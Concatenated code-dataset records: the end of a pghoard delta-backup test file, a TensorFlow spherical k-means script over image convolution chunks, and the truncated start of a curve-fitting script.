EncryptionData(\"test_key\", CONSTANT_TEST_RSA_PUBLIC_KEY)\n compression_data = CompressionData(\"snappy\", 0)\n chunk_uploader = ChunkUploader(\n metrics=metrics,\n chunks_on_disk=0,\n encryption_data=encryption_data,\n compression_data=compression_data,\n site_config=site_config,\n site=\"delta\",\n is_running=lambda: True,\n transfer_queue=transfer_queue\n )\n storage = Mock()\n data_file_format = \"{}/{}.{{0:08d}}.pghoard\".format(tmp_path, \"test\").format\n delta_base_backup = DeltaBaseBackup(\n storage=storage,\n site=\"delta\",\n site_config=site_config,\n transfer_queue=transfer_queue,\n metrics=metrics,\n encryption_data=encryption_data,\n compression_data=compression_data,\n get_remote_basebackups_info=MagicMock(),\n parallel=1,\n temp_base_dir=tmp_path,\n compressed_base=tmp_path,\n chunk_uploader=chunk_uploader,\n data_file_format=data_file_format,\n )\n\n return delta_base_backup\n\n\ndef generate_backup_meta_sample(base_backup_format: BaseBackupFormat) -> Dict[str, Any]:\n meta: Dict[str, Any] = {\"manifest\": {\"snapshot_result\": {\"state\": {\"files\": []}}}}\n files = []\n if base_backup_format == BaseBackupFormat.delta_v1:\n files = [{\n \"relative_path\": \"base/1/1\",\n \"file_size\": 8192,\n \"stored_file_size\": 100,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"delta1hex1\",\n \"content_b64\": None,\n }, {\n \"relative_path\": \"base/1/2\",\n \"file_size\": 8192,\n \"stored_file_size\": 200,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"delta1hex2\",\n \"content_b64\": None,\n }, {\n \"relative_path\": \"base/1/3\",\n \"file_size\": 1,\n \"stored_file_size\": 0,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"\",\n \"content_b64\": \"b64\",\n }]\n elif base_backup_format == BaseBackupFormat.delta_v2:\n files = [{\n \"relative_path\": \"base/1/3\",\n \"file_size\": 8192,\n \"stored_file_size\": 50,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"delta2hex1\",\n \"content_b64\": None,\n \"should_be_bundled\": False\n }, {\n \"relative_path\": \"base/1/4\",\n \"file_size\": 8192,\n \"stored_file_size\": 150,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"delta2hex2\",\n \"content_b64\": None,\n \"should_be_bundled\": False\n }, {\n \"relative_path\": \"base/1/4\",\n \"file_size\": 8192,\n \"stored_file_size\": 0,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"\",\n \"content_b64\": \"b64\",\n \"should_be_bundled\": False,\n }]\n\n meta[\"manifest\"][\"snapshot_result\"][\"state\"][\"files\"] = files\n return meta\n\n\ndef fake_download_backup_meta(basebackup_path: str, **kwargs): # pylint: disable=unused-argument\n meta = {}\n if basebackup_path == \"abc/basebackup/delta_v1\":\n meta = generate_backup_meta_sample(BaseBackupFormat.delta_v1)\n elif basebackup_path == \"abc/basebackup/delta_v2\":\n meta = generate_backup_meta_sample(BaseBackupFormat.delta_v2)\n\n return meta, b\"abc\"\n\n\ndef test_list_existing_files_skips_non_delta_formats(deltabasebackup: DeltaBaseBackup) -> None:\n with patch.object(deltabasebackup, \"get_remote_basebackups_info\") as mock_get_remote_basebackups_info, \\\n patch(\"pghoard.basebackup.delta.download_backup_meta_file\", new=fake_download_backup_meta):\n mock_get_remote_basebackups_info.return_value = [\n {\n \"metadata\": {\n \"format\": BaseBackupFormat.v1\n }\n },\n {\n \"metadata\": {\n \"format\": BaseBackupFormat.v2\n }\n },\n {\n \"metadata\": {\n \"format\": BaseBackupFormat.delta_v1\n },\n \"name\": \"delta_v1\"\n },\n {\n \"metadata\": {\n \"format\": BaseBackupFormat.delta_v2\n },\n \"name\": \"delta_v2\"\n },\n {\n \"metadata\": {\n \"format\": \"unknown\"\n }\n },\n ]\n assert deltabasebackup._list_existing_files() == { # pylint: disable=protected-access\n \"delta1hex1\": SnapshotFile(\n relative_path=Path(\"base/1/1\"),\n file_size=8192,\n stored_file_size=100,\n mtime_ns=1652175599798812244,\n hexdigest=\"delta1hex1\",\n content_b64=None\n ),\n \"delta1hex2\": SnapshotFile(\n relative_path=Path(\"base/1/2\"),\n file_size=8192,\n stored_file_size=200,\n mtime_ns=1652175599798812244,\n hexdigest=\"delta1hex2\",\n content_b64=None\n ),\n \"delta2hex1\": SnapshotFile(\n relative_path=Path(\"base/1/3\"),\n file_size=8192,\n stored_file_size=50,\n mtime_ns=1652175599798812244,\n hexdigest=\"delta2hex1\",\n content_b64=None\n ),\n \"delta2hex2\": SnapshotFile(\n relative_path=Path(\"base/1/4\"),\n file_size=8192,\n stored_file_size=150,\n mtime_ns=1652175599798812244,\n hexdigest=\"delta2hex2\",\n content_b64=None\n )\n }\n\n\n@pytest.mark.parametrize(\"chunk_size\", [0, 1, 2, 3])\ndef test_split_files_for_upload_bundled_files(chunk_size: int) -> None:\n bundled_file_1 = SnapshotFile(\n relative_path=Path(\"file1\"), file_size=1, stored_file_size=1, mtime_ns=0, should_be_bundled=True, missing_ok=False\n )\n bundled_file_2 = SnapshotFile(\n relative_path=Path(\"file2\"),\n file_size=1,\n stored_file_size=1,\n mtime_ns=0,\n should_be_bundled=True,\n missing_ok=True,\n )\n bundled_file_3 = SnapshotFile(\n relative_path=Path(\"file3\"),\n file_size=1,\n stored_file_size=1,\n mtime_ns=0,\n should_be_bundled=True,\n hexdigest=\"xyz\",\n missing_ok=True\n )\n files = [bundled_file_1, bundled_file_2, bundled_file_3]\n snapshot_result = SnapshotResult(\n state=SnapshotState(root_globs=[\"**/*\"], files=files, empty_dirs=[]),\n end=None,\n hashes=None,\n )\n delta_chunks, hexdigests = DeltaBaseBackup._split_files_for_upload( # pylint: disable=protected-access\n snapshot_result=snapshot_result, snapshot_dir=Path(\"/dir\"), chunk_size=chunk_size\n )\n assert not hexdigests\n chunk_file1 = (Path(\"file1\"), Path(\"/dir/file1\"), False)\n chunk_file2 = (Path(\"file2\"), Path(\"/dir/file2\"), True)\n chunk_file3 = (Path(\"file3\"), Path(\"/dir/file3\"), True)\n if chunk_size <= 1:\n assert delta_chunks == [{chunk_file1}, {chunk_file2}, {chunk_file3}]\n elif chunk_size == 2:\n assert delta_chunks == [{chunk_file1, chunk_file2}, {chunk_file3}]\n elif chunk_size == 3:\n assert delta_chunks == [{chunk_file1, chunk_file2, chunk_file3}]\n\n\ndef test_split_files_for_upload_mixed_files() -> None:\n hexdigest_file = SnapshotFile(relative_path=Path(\"file1\"), file_size=5, stored_file_size=1, mtime_ns=0, hexdigest=\"abc\")\n bundled_file_1 = SnapshotFile(\n relative_path=Path(\"file2\"), file_size=2, stored_file_size=1, mtime_ns=0, should_be_bundled=True\n )\n bundled_file_2 = SnapshotFile(\n relative_path=Path(\"file3\"), file_size=2, stored_file_size=1, mtime_ns=0, should_be_bundled=True, hexdigest=\"xyz\"\n )\n _ = SnapshotFile(relative_path=Path(\"file3\"), file_size=2, stored_file_size=1, mtime_ns=0, content_b64=\"b64==\")\n files = [hexdigest_file, bundled_file_1, bundled_file_2]\n snapshot_result = SnapshotResult(\n state=SnapshotState(root_globs=[\"**/*\"], files=files, empty_dirs=[]), end=None, hashes=None\n )\n delta_chunks, hexdigests = DeltaBaseBackup._split_files_for_upload( # pylint: disable=protected-access\n snapshot_result=snapshot_result, snapshot_dir=Path(\"/dir\"), chunk_size=1\n )\n assert hexdigests == {\"abc\"}\n chunk_file1 = (Path(\"file2\"), Path(\"/dir/file2\"), True)\n chunk_file2 = (Path(\"file3\"), Path(\"/dir/file3\"), True)\n assert delta_chunks == [{chunk_file1}, {chunk_file2}]\n\n\ndef test_split_files_for_upload_skips_hexdigests() -> None:\n hexdigest_file_1 = SnapshotFile(\n relative_path=Path(\"file1\"), file_size=5, stored_file_size=1, mtime_ns=0, hexdigest=\"abc\"\n )\n hexdigest_file_2 = SnapshotFile(\n relative_path=Path(\"file2\"), file_size=5, stored_file_size=1, mtime_ns=0, hexdigest=\"def\"\n )\n files = [hexdigest_file_1, hexdigest_file_2]\n snapshot_result = SnapshotResult(\n state=SnapshotState(root_globs=[\"**/*\"], files=files, empty_dirs=[]), end=None, hashes=None\n )\n delta_chunks, hexdigests = DeltaBaseBackup._split_files_for_upload( # pylint: disable=protected-access\n snapshot_result=snapshot_result, snapshot_dir=Path(\"/dir\"), chunk_size=1, skip_hexdigests={\"abc\"}\n )\n assert hexdigests == {\"def\"}\n assert not delta_chunks\n\n\ndef test_submit_files_in_thread_fails_when_file_disappears(\n deltabasebackup: DeltaBaseBackup, delta_paths: Tuple[Path, Path], delta_file: Tuple[Path, str], snapshotter: Snapshotter\n) -> None:\n _, dst = delta_paths\n file_name, file_hash = delta_file\n\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\"):\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n (dst / file_name).unlink()\n assert not deltabasebackup._submit_files_in_thread( # pylint: disable=protected-access\n snapshotter=snapshotter, callback_queue=CallbackQueue(), new_hashes={}, hexdigest=file_hash\n )\n\n\ndef test_submit_files_in_thread_skip_upload(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_file: Tuple[Path, str]\n) -> None:\n _, file_hash = delta_file\n\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest:\n mock_delta_upload_hexdigest.return_value = (200, 10, file_hash, True)\n new_hashes: Dict[str, Tuple[int, int]] = {}\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n assert deltabasebackup._submit_files_in_thread( # pylint: disable=protected-access\n snapshotter=snapshotter, callback_queue=CallbackQueue(), new_hashes=new_hashes, hexdigest=file_hash\n )\n assert file_hash in new_hashes\n\n\ndef test_submit_files_in_thread_exception_silenced(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_file: Tuple[Path, str]\n) -> None:\n _, file_hash = delta_file\n\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest:\n mock_delta_upload_hexdigest.side_effect = Exception\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n assert not deltabasebackup._submit_files_in_thread( # pylint: disable=protected-access\n snapshotter=snapshotter, callback_queue=CallbackQueue(), new_hashes={}, hexdigest=file_hash\n )\n\n\ndef test_submit_files_in_thread_normal_upload(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_file: Tuple[Path, str]\n) -> None:\n _, file_hash = delta_file\n\n callback_queue: CallbackQueue = CallbackQueue()\n new_hashes: Dict[str, Tuple[int, int]] = {}\n\n callback_queue.get = Mock() # type: ignore\n callback_queue.get.side_effect = [Empty, None]\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest:\n mock_delta_upload_hexdigest.side_effect = callback_queue.put(CallbackEvent(success=True)) # type: ignore\n mock_delta_upload_hexdigest.return_value = (200, 10, file_hash, False)\n\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n assert deltabasebackup._submit_files_in_thread( # pylint: disable=protected-access\n snapshotter=snapshotter, callback_queue=callback_queue, new_hashes=new_hashes, hexdigest=file_hash,\n queue_timeout=0.1\n )\n\n assert file_hash in new_hashes\n\n\n@pytest.mark.parametrize(\"skip_upload\", [True, False])\ndef test_delta_upload_hexdigest(skip_upload: bool, deltabasebackup: DeltaBaseBackup, tmp_path: Path) -> None:\n file_path = tmp_path / \"new_file.dat\"\n with open(file_path, \"bw\") as f:\n f.write(b\"some data\" * 100)\n\n chunk_path = tmp_path / \"chunks\"\n chunk_path.mkdir()\n\n if skip_upload:\n deltabasebackup.submitted_hashes = {\"5cc8204133a65382a9045c82ffe166fb561e9d3f7c34babf85ed960e6195ea09\"}\n\n with open(file_path, \"rb\") as f:\n assert deltabasebackup._delta_upload_hexdigest( # pylint: disable=protected-access\n temp_dir=tmp_path,\n chunk_path=chunk_path / \"some file\",\n file_obj=f,\n callback_queue=CallbackQueue(),\n relative_path=Path(\"does/not/matter\")\n ) == (900, 240, \"5cc8204133a65382a9045c82ffe166fb561e9d3f7c34babf85ed960e6195ea09\", skip_upload)\n\n\n@pytest.mark.parametrize(\"key_exists\", [True, False])\ndef test_upload_single_delta_files_cleanup_after_error(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_file: Tuple[Path, str], key_exists: bool\n) -> None:\n _, file_hash = delta_file\n\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest:\n mock_delta_upload_hexdigest.return_value = (200, 10, file_hash, True)\n snapshotter.update_snapshot_file_data = Mock(side_effect=Exception)\n\n if not key_exists:\n deltabasebackup.storage.delete_key.side_effect = FileNotFoundFromStorageError\n\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n with pytest.raises(BackupFailure):\n deltabasebackup._upload_single_delta_files(todo_hexdigests={file_hash}, snapshotter=snapshotter, progress=0) # pylint: disable=protected-access\n deltabasebackup.storage.delete_key.assert_called_with(f\"abc/basebackup_delta/{file_hash}\")\n\n\n@pytest.mark.parametrize(\"files_count, initial_progress\", [(1, 0), (4, 0), (10, 0), (1, 90), (15, 10)])\ndef test_upload_single_delta_files_progress(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_files_generator: DeltaFilesGeneratorType,\n files_count: int, initial_progress: float\n) -> None:\n delta_files = list(delta_files_generator(files_count))\n delta_hashes = {file_hash for _, file_hash in delta_files}\n\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest, \\\n patch.object(deltabasebackup, \"metrics\") as mock_metrics:\n mock_delta_upload_hexdigest.side_effect = [(200, 10, file_hash, True) for file_hash in delta_hashes]\n snapshotter.update_snapshot_file_data = Mock()\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n deltabasebackup._upload_single_delta_files( # pylint: disable=protected-access\n todo_hexdigests=delta_hashes, snapshotter=snapshotter, progress=initial_progress\n )\n expected_calls = [\n mock.call(\n \"pghoard.basebackup_estimated_progress\",\n initial_progress + (idx + 1) * (100 - initial_progress) / files_count,\n tags={\"site\": \"delta\"}\n ) for idx in range(files_count)\n ]\n assert mock_metrics.gauge.mock_calls == expected_calls\n\n\ndef test_upload_single_delta_files(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_file: Tuple[Path, str]\n) -> None:\n _, file_hash = delta_file\n\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest:\n mock_delta_upload_hexdigest.return_value = (200, 10, file_hash, True)\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n metric = deltabasebackup._upload_single_delta_files( # pylint: disable=protected-access\n todo_hexdigests={file_hash}, snapshotter=snapshotter, progress=0\n )\n assert metric == UploadedFilesMetric(input_size=200, stored_size=10, count=1)\n\n\ndef test_read_delta_sizes(deltabasebackup: DeltaBaseBackup):\n files = [\n SnapshotFile(relative_path=Path(\"f1\"), file_size=100, stored_file_size=20, mtime_ns=0, should_be_bundled=True),\n SnapshotFile(\n relative_path=Path(\"f2\"), file_size=100, stored_file_size=20, mtime_ns=0, should_be_bundled=False, hexdigest=\"a\"\n ),\n SnapshotFile(\n relative_path=Path(\"f3\"), file_size=200, stored_file_size=40, mtime_ns=0, should_be_bundled=False, hexdigest=\"b\"\n ),\n SnapshotFile(\n relative_path=Path(\"f4\"),\n file_size=5,\n stored_file_size=5,\n mtime_ns=0,\n should_be_bundled=False,\n hexdigest=\"\",\n content_b64=\"b64\"\n )\n ]\n snapshot_result = SnapshotResult(\n state=SnapshotState(root_globs=[\"**/*\"], files=files, empty_dirs=[]), end=None, hashes=None\n )\n digest_metric, embed_metric = deltabasebackup._read_delta_sizes(snapshot_result=snapshot_result) # pylint: disable=protected-access\n assert digest_metric == UploadedFilesMetric(input_size=300, stored_size=60, count=2)\n assert embed_metric == UploadedFilesMetric(input_size=5, stored_size=5, count=1)\n\n # Add one more file which should not be uploaded as it was already uploaded previously, so the stored_file_size\n # should be restored from already tracked files\n files.append(\n SnapshotFile(\n relative_path=Path(\"f5\"), file_size=300, stored_file_size=0, mtime_ns=0, should_be_bundled=False, hexdigest=\"c\"\n )\n )\n snapshot_result = SnapshotResult(\n state=SnapshotState(root_globs=[\"**/*\"], files=files, empty_dirs=[]), end=None, hashes=None\n )\n deltabasebackup.tracked_snapshot_files = {\n \"c\": SnapshotFile(\n relative_path=Path(\"f5\"), file_size=300, stored_file_size=60, mtime_ns=0, should_be_bundled=False, hexdigest=\"c\"\n )\n }\n digest_metric, embed_metric = deltabasebackup._read_delta_sizes(snapshot_result=snapshot_result) # pylint: disable=protected-access\n assert digest_metric == UploadedFilesMetric(input_size=600, stored_size=120, count=3)\n assert embed_metric == UploadedFilesMetric(input_size=5, stored_size=5, count=1)\n","sub_path":"test/basebackup/test_delta.py","file_name":"test_delta.py","file_ext":"py","file_size_in_byte":21682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"208837194","text":"\"\"\"\nThis module extracts conv chunks from an image file. Unlike many others such as imagell.py cluster.py and knnimage.py\nit does not use MapFn but rather extracts and moves slices\n\nIt then creates a clustering from that database and tests the cluster by finding accuracy for labeling test files\nwith direct access to the database and then again against only the subset of the database brought in by the clusters\n\nNote the K means implemented here is spherical k means\n\nAt time of writing the testing itself was not implemented yet. You'll see a TBD below if still true\n\n\"\"\"\nfrom __future__ import print_function\n# import csv\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport random\nimport urllib2\nfrom matplotlib import pyplot as plt\nfrom tensorflow.python import debug as tf_debug\n\n\nfdir = (\"/devlink2/data/imagenet/\")\nimg_w = 32 # 12\nimg_h = 32 # 8\nc_num_convs = img_h*img_w\nc_num_centroids = 300\nc_kernel_size = 3*3*3\nc_num_ks = 3 # 32\nc_class_dir_limit = 200\nc_min_file_size = 1000\nc_num_files_per_batch = 1000 # 2000\n# how much to offset the reciprocal for vote counting. So that the first is 1/c_knn_offset, second 1/(c_knn_offset+1) etc.\n# the higher the value the less rank actually matters\nc_knn_offset = 5.0\nc_num_classes = 10\ncb_limit_classes = True\n\n\nt_data = tf.Variable(tf.zeros([3, img_h+2, img_w+2], dtype=tf.float32), name='t_data')\n\n# image_string = urllib2.urlopen(url).read()\nclassnames = []\nfor ifn, fn in enumerate(os.listdir(fdir)):\n\tffn = os.path.join(fdir, fn)\n\tif os.path.isdir(ffn):\n\t\tclassnames.append(fn)\n\nall_file_list = []\nnum_files_in_class = []\nfor classname in classnames:\n\tfile_list = []\n\tdir_name = os.path.join(fdir, classname)\n\tfor ifn, fn in enumerate(os.listdir(dir_name)):\n\t\tif ifn >= c_class_dir_limit:\n\t\t\tbreak\n\t\tffn = os.path.join(dir_name, fn)\n\t\tif not os.path.isfile(ffn) or os.path.getsize(ffn) < c_min_file_size:\n\t\t\tcontinue\n\t\tfile_list.append(fn)\n\tall_file_list.append(file_list)\n\tnum_files_in_class.append(ifn)\n\nnum_classes = len(classnames)\nif cb_limit_classes:\n\tnum_classes = min(num_classes, c_num_classes)\n\ndef get_file_strings(num):\n\tstrings = []\n\tclasses = []\n\tfor inum in range(num):\n\t\ticlass = random.randint(0, num_classes-1)\n\t\tifile = random.randint(0, num_files_in_class[iclass] - 1)\n\t\tffn = os.path.join(fdir, classnames[iclass], all_file_list[iclass][ifile])\n\t\twith open(ffn, mode='rb') as f:\n\t\t\tstrings.append(f.read())\n\t\tclasses.append(iclass)\n\treturn strings, classes\n\n# Decode string into matrix with intensity values\nph_image_string = tf.placeholder(dtype=tf.string, shape=(), name='ph_image_string')\nimage = tf.image.decode_jpeg(ph_image_string, channels=3)\nimage = tf.expand_dims(image, 0)\nimage = tf.image.resize_bilinear(image, [img_h+2, img_w+2])[0]\nop_data_set = tf.assign(t_data, tf.transpose(image, perm=[2,0,1]), name='op_data_set')\n\n# A simple loop to create an array of images each one offset width and height\n# creates a list of 9 tensors each Shape=[3, img_h, img_w].\n# note the original was 2 pixels more in each of the flat dims\nconvarr = []\nfor r in range(3):\n\tfor c in range(3):\n\t\tconvarr.append(t_data[:, r:r+img_h, c:c+img_w])\n\n# stack the array. Shape=[9, 3, img_h, img_w]\nt_stacked = tf.stack(convarr, name='t_stacked')\n# Transpose so the data actually moves i.e. the flat underlying representation has data in a different order.\n# Shape=[img_h, img_w, 9, 3, ]\nt_convs = tf.transpose(t_stacked, perm=[2, 3, 0, 1], name='t_convs')\n# reshape for what we want in the database or query images.\n# shape=[c_num_convs, c_kernel_size]\nt_chunks = tf.reshape(t_convs, [img_h*img_w, c_kernel_size], name='t_chunks')\n# l2 normalize. Each chunk now has square of properties sum to 1. This captures the structure rather than ans values\ndb_norm = tf.nn.l2_normalize(t_chunks, dim=1, name='db_norm')\n\n# variable (and stop for call graph) holding the db that knn queries will run against.\n# set by assign from op_db_norm_set\nv_db_norm = tf.Variable(tf.zeros(shape=[c_num_convs*c_num_files_per_batch,c_kernel_size], dtype=tf.float32), name='v_db_norm')\n# place holder for the database, copied in from a numpy array built up from the convs of each image.\nph_db_norm = tf.placeholder(dtype=tf.float32, shape=[c_num_convs*c_num_files_per_batch,c_kernel_size], name='ph_db_norm')\n# op to put placeholder value into database\nop_db_norm_set = tf.assign(v_db_norm, ph_db_norm, name='op_db_norm_set')\n\n# variable for lables\nv_db_labels = tf.Variable(tf.zeros(shape=[c_num_convs*c_num_files_per_batch], dtype=tf.int32), name='v_db_labels')\n# place holder for the labels which are just the classes of the image repeated along all the convs of each image\nph_db_labels = tf.placeholder(dtype=tf.int32, shape=[c_num_convs*c_num_files_per_batch], name='ph_db_labels')\n# op to put placeholder value into database\nop_db_labels_set = tf.assign(v_db_labels, ph_db_labels, name='op_db_labels_set')\n\n# The goal is to cluster the convolution vectors so that we can perform dimension reduction\n# KMeans implementation\n# Intitialize the centroids indicies. Shape=[num_centroids]\nt_centroids_idxs_init = tf.random_uniform([c_num_centroids], 0, c_num_convs-1, dtype=tf.int32, name='t_centroids_idxs_init')\n# Get the centroids variable ready. Must persist between loops. Shape=[c_num_convs*c_num_files_per_batch, c_kernel_size]\nv_centroids = tf.Variable(tf.zeros([c_num_centroids, c_kernel_size], dtype=tf.float32), name='v_centroids')\n# Create actual centroids as seeds. Shape=[num_centroids, c_kernel_size]\nop_centroids_init = tf.assign(v_centroids, tf.gather(v_db_norm, t_centroids_idxs_init, name='op_centroids_init'))\n# Do cosine distances for all centroids on all elements of the db. Shape [c_num_centroids, c_num_convs*c_num_files_per_batch]\nt_all_CDs = tf.matmul(v_centroids, v_db_norm, transpose_b=True, name='t_all_CDs')\n# Do top_k. Shape = [c_num_centroids, c_num_ks]\n## t_best_CDs, t_best_CD_idxs = tf.nn.top_k(t_all_CDs, c_num_ks, sorted=True, name='t_best_CD_idxs')\n# For each element in the matrix, find the centroid that's closest. Shape=[c_num_convs*c_num_files_per_batch]\nv_closest_idxs = tf.Variable(tf.zeros(shape=[c_num_convs*c_num_files_per_batch], dtype=tf.int64), name='v_closest_idxs')\nop_closest_idxs_set = tf.assign(v_closest_idxs, tf.argmax(t_all_CDs, axis=0), name='op_closest_idxs_set')\nl_new_centroids = []\nl_votes_count = []\nfor icent in range(c_num_centroids):\n\t# Create an array of True if the closest index was this centroid\n\t# Shape=[c_num_centroids]\n\tt_vote_for_this = tf.equal(v_closest_idxs, icent, name='t_vote_for_this')\n\t# Count the number of trues in the vote_for_tis tensor\n\t# Shape=()\n\tt_vote_count = tf.reduce_sum(tf.cast(t_vote_for_this, tf.float32), name='t_vote_count')\n\t# Create the cluster. Use the True positions to put in the values from the v_db_norm and put zeros elsewhere.\n\t# This means that instead of a short list of the vectors in this cluster we use the full size with zeros for non-members\n\t# Shape=[c_num_convs*c_num_files_per_batch, c_kernel_size]\n\tt_this_cluster = tf.where(t_vote_for_this, v_db_norm, tf.zeros([c_num_convs*c_num_files_per_batch, c_kernel_size]), name='t_this_cluster')\n\t# Sum the values for each property to get the aveage property\n\t# Shape=[c_kernel_size]\n\tt_cluster_sum = tf.reduce_sum(t_this_cluster, axis=0, name='t_cluster_sum')\n\t# Shape=[c_kernel_size]\n\tt_avg = tf.cond(t_vote_count > 0.0,\n\t\t\t\t\tlambda: tf.divide(t_cluster_sum, t_vote_count),\n\t\t\t\t\tlambda: tf.zeros([c_kernel_size]),\n\t\t\t\t\tname='t_avg')\n\tl_new_centroids.append(t_avg)\n\tl_votes_count.append(t_vote_count)\n# Do random centroids again. This time for filling in\nt_centroids_idxs = tf.random_uniform([c_num_centroids], 0, c_num_convs-1, dtype=tf.int32, name='t_centroids_idxs')\n#Shape = [c_num_centroids, c_kernel_size]\nt_new_centroids = tf.stack(l_new_centroids, name='t_new_centroids')\n# First time around I forgot that I must normalize the centroids as required for shperical k-means. Avg, as above, will not produce a normalized result\nt_new_centroids_norm = tf.nn.l2_normalize(t_new_centroids, dim=1, name='t_new_centroids_norm')\n#Shape=[c_num_centroids]\nt_votes_count = tf.stack(l_votes_count, name='t_votes_count')\n# take the new random idxs and gather new centroids from the db. Only used in case count == 0. Shape=[num_centroids, c_kernel_size]\nt_centroids_from_idxs = tf.gather(v_db_norm, t_centroids_idxs, name='t_centroids_from_idxs')\n# Assign back to the original v_centroids so that we can go for another round\nop_centroids_update = tf.assign(v_centroids, tf.where(tf.greater(t_votes_count, 0.0), t_new_centroids_norm,\n\t\t\t\t\t\t\t\t\t\t\t\t\t t_centroids_from_idxs, name='centroids_where'),\n\t\t\t\t\t\t\t\tname='op_centroids_update')\n\n# The following section of code is designed to evaluate the cluster quality, specifically the average distance of a conv fragment from\n# its centroid.\n# t_closest_idxs is an index for each element in the database, specifying which cluster it belongs to. So we use that to\n# replicate the centroid of that cluster to the locations alligned with each member of the database\n# Shape=[c_num_convs*c_num_files_per_batch, c_kernel_size]\nt_centroid_broadcast = tf.gather(v_centroids, v_closest_idxs, name='t_centroid_broadcast')\n# element-wise multiplication of each property and the sum down the properties. It is reallt just a CD but we aren't using matmul\n# Shape=[c_num_convs*c_num_files_per_batch]\nt_cent_dist = tf.reduce_sum(tf.multiply(v_db_norm, t_centroid_broadcast), axis=1, name='t_cent_dist')\n# Extract a single number representing the kmeans error. This is the mean of the distances from closest centers. Shape=()\nt_kmeans_err = tf.reduce_mean(t_cent_dist, name='t_kmeans_err')\nt_sumsq_centroids = tf.reduce_sum(tf.square(v_centroids), axis=1)\n\n\n\nsess = tf.Session(config=tf.ConfigProto(log_device_placement=True))\n# sess = tf.Session()\nmerged = tf.summary.merge_all()\nsummaries_dir = '/tmp'\ntrain_writer = tf.summary.FileWriter(summaries_dir + '/train',\n sess.graph)\n\nsess.run(tf.global_variables_initializer())\n# sess = tf_debug.LocalCLIDebugWrapperSession(sess, ui_type=\"curses\")\n\n# qtrings, qclass = get_file_strings(1)\n# sess.run(op_data_set, feed_dict={ph_image_string: qtrings[0]})\n# r_convs, r_data, r_stacked, r_chunks = sess.run([t_convs, t_data, t_stacked, t_chunks])\n\nstrings, classes = get_file_strings(c_num_files_per_batch)\ndb_els = np.zeros([c_num_convs*c_num_files_per_batch, c_kernel_size], dtype=np.float32)\ndb_labels = np.repeat(classes, c_num_convs)\nfor ibatch in range(c_num_files_per_batch):\n\tsess.run(op_data_set, feed_dict={ph_image_string:strings[ibatch]})\n\tdb_els[ibatch*c_num_convs:(ibatch+1)*c_num_convs] = sess.run(db_norm)\n\tif (ibatch % (c_num_files_per_batch / 100) == 0):\n\t\tprint('num files in db:', ibatch)\n\nsess.run(op_db_norm_set, feed_dict={ph_db_norm:db_els })\nsess.run(op_db_labels_set, feed_dict={ph_db_labels:db_labels })\n\nprint('db created.')\n\n# start by creating random centroids\nsess.run(op_centroids_init)\nr_sumsq_centroids = sess.run(t_sumsq_centroids)\n# calculate the closest centroid for each db record\nsess.run(op_closest_idxs_set)\nprint('r_votes_count =', sess.run(t_votes_count))\nprint('r_kmeans_err =', sess.run(t_kmeans_err))\nfor ikmeans in range(30):\n\tprint('run num:', ikmeans)\n\tr_centroids = sess.run(op_centroids_update)\n\tr_sumsq_centroids = sess.run(t_sumsq_centroids)\n\tprint('r_votes_count =', sess.run(t_votes_count))\n\tprint('r_kmeans_err =', sess.run(t_kmeans_err))\n\tsess.run(op_closest_idxs_set)\n\n# TBD!!!\n# Implement testing of cluster\n\n# np_image = sess.run(image)\n#\n# plt.figure()\n# plt.imshow(np_image.astype(np.uint8))\n# plt.suptitle(ffn, fontsize=14, fontweight='bold')\n# # plt.axis('off')\n# plt.show()\n\nprint('done!')","sub_path":"convknn.py","file_name":"convknn.py","file_ext":"py","file_size_in_byte":11669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"172394738","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.optimize import least_squares\nimport sys\n\ndef Tanh(z, n0, z0, w):\n return 0.5 * n0 * ( 1. - np.tanh( ( z - z0 ) / w ) )\n\ndef cyl(p, x, z):\n return ( pow(x-p[0], 2.) + pow(z-p[1], 2.) - p[2])\n\ncapLen=115.\ntStart=int(sys.argv[1])\ntEnd=int(sys.argv[2])\ntFileStart=int(sys.argv[3])\ntDiff=200\ndt=0.01\nnElem=int((tEnd-tStart)/tDiff)+1\ntime=np.linspace(tStart,tEnd, nElem)\ntDiff=200\n\n# obtain radii and other parameters\ncapRad=5.\noffSet=1.\nradStart=0.\nradEnd=capRad+offSet\ndr=0.5\nr = 